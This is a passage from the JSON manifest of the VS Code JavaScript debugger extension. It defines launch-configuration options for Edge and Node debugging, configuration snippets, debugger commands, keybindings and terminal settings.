source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"When debugging webviews, the port the webview debugger is listening on. Will be automatically discovered if not set.","type":"number"},"profileStartup":{"default":true,"description":"If true, will start profiling soon as the process launches","type":"boolean"},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"type":"array"},"runtimeExecutable":{"default":"stable","description":"Either 'canary', 'stable', 'dev', 'custom' or path to the browser executable. Custom means a custom wrapper, custom build or EDGE_PATH environment variable.","type":["string","null"]},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"useWebView":{"default":false,"description":"When 'true', the debugger will treat the runtime executable as a host application that contains a WebView allowing you to debug the WebView script content.","type":"boolean"},"userDataDir":{"default":true,"description":"By default, the browser is launched with a separate user profile in a temp folder. Use this option to override it. Set to false to launch with your default user profile. A new browser can't be launched if an instance is already running from `userDataDir`.","type":["string","boolean"]},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}}},"configurationSnippets":[{"body":{"name":"Launch Edge","request":"launch","type":"msedge","url":"http://localhost:8080","webRoot":"^\"${2:\\${workspaceFolder\\}}\""},"description":"Launch Edge to debug a URL","label":"Edge: Launch"},{"body":{"name":"Attach to Edge","port":9222,"request":"attach","type":"msedge","webRoot":"^\"${2:\\${workspaceFolder\\}}\""},"description":"Attach to an instance of Edge already in debug mode","label":"Edge: Attach"}],"label":"Web App (Edge)","strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"msedge"}],"commands":[{"command":"extension.js-debug.prettyPrint","title":"Pretty print for debugging","category":"Debug","icon":"$(json)"},{"command":"extension.js-debug.toggleSkippingFile","title":"Toggle Skipping this File","category":"Debug"},{"command":"extension.js-debug.addCustomBreakpoints","title":"Toggle Event Listener Breakpoints","icon":"$(add)"},{"command":"extension.js-debug.removeAllCustomBreakpoints","title":"Remove All Event Listener Breakpoints","icon":"$(close-all)"},{"command":"extension.js-debug.addXHRBreakpoints","title":"Add XHR/fetch Breakpoint","icon":"$(add)"},{"command":"extension.js-debug.removeXHRBreakpoint","title":"Remove XHR/fetch Breakpoint","icon":"$(remove)"},{"command":"extension.js-debug.editXHRBreakpoints","title":"Edit XHR/fetch Breakpoint","icon":"$(edit)"},{"command":"extension.pwa-node-debug.attachNodeProcess","title":"Attach to Node Process","category":"Debug"},{"command":"extension.js-debug.npmScript","title":"Debug npm Script","category":"Debug"},{"command":"extension.js-debug.createDebuggerTerminal","title":"JavaScript Debug Terminal","category":"Debug"},{"command":"extension.js-debug.startProfile","title":"Take Performance Profile","category":"Debug","icon":"$(record)"},{"command":"extension.js-debug.stopProfile","title":"Stop Performance Profile","category":"Debug","icon":"resources/dark/stop-profiling.svg"},{"command":"extension.js-debug.revealPage","title":"Focus Tab","category":"Debug"},{"command":"extension.js-debug.debugLink","title":"Open Link","category":"Debug"},{"command":"extension.js-debug.createDiagnostics","title":"Diagnose Breakpoint Problems","category":"Debug"},{"command":"extension.js-debug.getDiagnosticLogs","title":"Save Diagnostic JS Debug Logs","category":"Debug"},{"command":"extension.node-debug.startWithStopOnEntry","title":"Start Debugging and Stop on Entry","category":"Debug"},{"command":"extension.js-debug.openEdgeDevTools","title":"Open Browser Devtools","icon":"$(inspect)","category":"Debug"},{"command":"extension.js-debug.callers.add","title":"Exclude Caller","category":"Debug"},{"command":"extension.js-debug.callers.remove","title":"Remove excluded caller","icon":"$(close)"},{"command":"extension.js-debug.callers.removeAll","title":"Remove all excluded callers","icon":"$(clear-all)"},{"command":"extension.js-debug.callers.goToCaller","title":"Go to caller location","icon":"$(call-outgoing)"},{"command":"extension.js-debug.callers.gotToTarget","title":"Go to target location","icon":"$(call-incoming)"},{"command":"extension.js-debug.enableSourceMapStepping","title":"Enable Source Mapped Stepping","icon":"$(compass-dot)"},{"command":"extension.js-debug.disableSourceMapStepping","title":"Disable Source Mapped Stepping","icon":"$(compass)"},{"command":"extension.js-debug.network.viewRequest","title":"View Request as cURL","icon":"$(arrow-right)"},{"command":"extension.js-debug.network.clear","title":"Clear Network Log","icon":"$(clear-all)"},{"command":"extension.js-debug.network.openBody","title":"Open Response Body"},{"command":"extension.js-debug.network.openBodyInHex","title":"Open Response Body in Hex Editor"},{"command":"extension.js-debug.network.replayXHR","title":"Replay Request"},{"command":"extension.js-debug.network.copyUri","title":"Copy Request URL"}],"keybindings":[{"command":"extension.node-debug.startWithStopOnEntry","key":"F10","mac":"F10","when":"debugConfigurationType == pwa-node && !inDebugMode || debugConfigurationType == pwa-extensionHost && !inDebugMode || debugConfigurationType == node && !inDebugMode"},{"command":"extension.node-debug.startWithStopOnEntry","key":"F11","mac":"F11","when":"debugConfigurationType == pwa-node && !inDebugMode && activeViewlet == workbench.view.debug || debugConfigurationType == pwa-extensionHost && !inDebugMode && activeViewlet == workbench.view.debug || debugConfigurationType == node && !inDebugMode && activeViewlet == workbench.view.debug"}],"configuration":{"title":"JavaScript Debugger","properties":{"debug.javascript.codelens.npmScripts":{"enum":["top","all","never"],"default":"top","description":"Where a \"Run\" and \"Debug\" code lens should be shown in your npm scripts. It may be on \"all\", scripts, on \"top\" of the script section, or \"never\"."},"debug.javascript.terminalOptions":{"type":"object","description":"Default launch options for the JavaScript debug terminal and npm scripts.","default":{},"properties":{"resolveSourceMapLocations":{"type":["array","null"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","default":["${workspaceFolder}/**","!**/node_modules/**"],"items":{"type":"string"}},"outFiles":{"type":["array"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"items":{"type":"string"},"tags":["setup"]},"pauseForSourceMap":{"type":"boolean","markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","default":false},"showAsyncStacks":{"description":"Show the async calls that led to the current call stack.","default":true,"oneOf":[{"type":"boolean"},{"type":"object","required":["onAttach"],"properties":{"onAttach":{"type":"number","default":32}}},{"type":"object","required":["onceBreakpointResolved"],"properties":{"onceBreakpointResolved":{"type":"number","default":32}}}]},"skipFiles":{"type":"array","description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","default":["${/**"]},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"sourceMapRenames":{"type":"boolean","default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers."},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","default":{"webpack://?:*/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","meteor://💻app/*":"${workspaceFolder}/*"}},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"timeouts":{"type":"object","description":"Timeouts for several debugger operations.","default":{},"properties":{"sourceMapMinPause":{"type":"number","description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","default":1000},"sourceMapCumulativePause":{"type":"number","description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","default":1000},"hoverEvaluation":{"type":"number","description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","default":500}},"additionalProperties":false,"markdownDescription":"Timeouts for several debugger operations."},"trace":{"description":"Configures what diagnostic output is produced.","default":true,"oneOf":[{"type":"boolean","description":"Trace may be set to 'true' to write diagnostic logs to the disk."},{"type":"object","additionalProperties":false,"properties":{"stdio":{"type":"boolean","description":"Whether to return trace data from the launched application or browser."},"logFile":{"type":["string","null"],"description":"Configures where on disk logs are written."}}}]},"outputCapture":{"enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`.","default":"console"},"enableContentValidation":{"default":true,"type":"boolean","description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example."},"customDescriptionGenerator":{"type":"string","description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n "},"customPropertiesGenerator":{"type":"string","deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181"},"cascadeTerminateToConfigurations":{"type":"array","items":{"type":"string","uniqueItems":true},"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped."},"enableDWARF":{"type":"boolean","default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function."},"cwd":{"type":"string","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","default":"${workspaceFolder}","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"]},"localRoot":{"type":["string","null"],"description":"Path to the local directory containing the program.","default":null},"remoteRoot":{"type":["string","null"],"description":"Absolute path to the remote directory containing the program.","default":null},"autoAttachChildProcesses":{"type":"boolean","description":"Attach debugger to new child processes automatically.","default":true},"env":{"type":"object","additionalProperties":{"type":["string","null"]},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","default":{},"tags":["setup"]},"envFile":{"type":"string","description":"Absolute path to a file containing environment variable definitions.","default":"${workspaceFolder}/.env"},"runtimeSourcemapPausePatterns":{"type":"array","items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","default":[]},"nodeVersionHint":{"type":"number","minimum":8,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","default":12},"command":{"type":["string","null"],"description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","default":"npm start","tags":["setup"]}}},"debug.javascript.automaticallyTunnelRemoteServer":{"type":"boolean","description":"When debugging a remote web app, configures whether to automatically tunnel the remote server to your local machine.","default":true},"debug.javascript.debugByLinkOptions":{"default":"on","description":"Options used when debugging open links clicked from inside the JavaScript Debug Terminal. Can be set to \"off\" to disable this behavior, or \"always\" to enable debugging in all terminals.","oneOf":[{"type":"string","enum":["on","off","always"]},{"type":"object","properties":{"resolveSourceMapLocations":{"type":["array","null"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","default":null,"items":{"type":"string"}},"outFiles":{"type":["array"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its 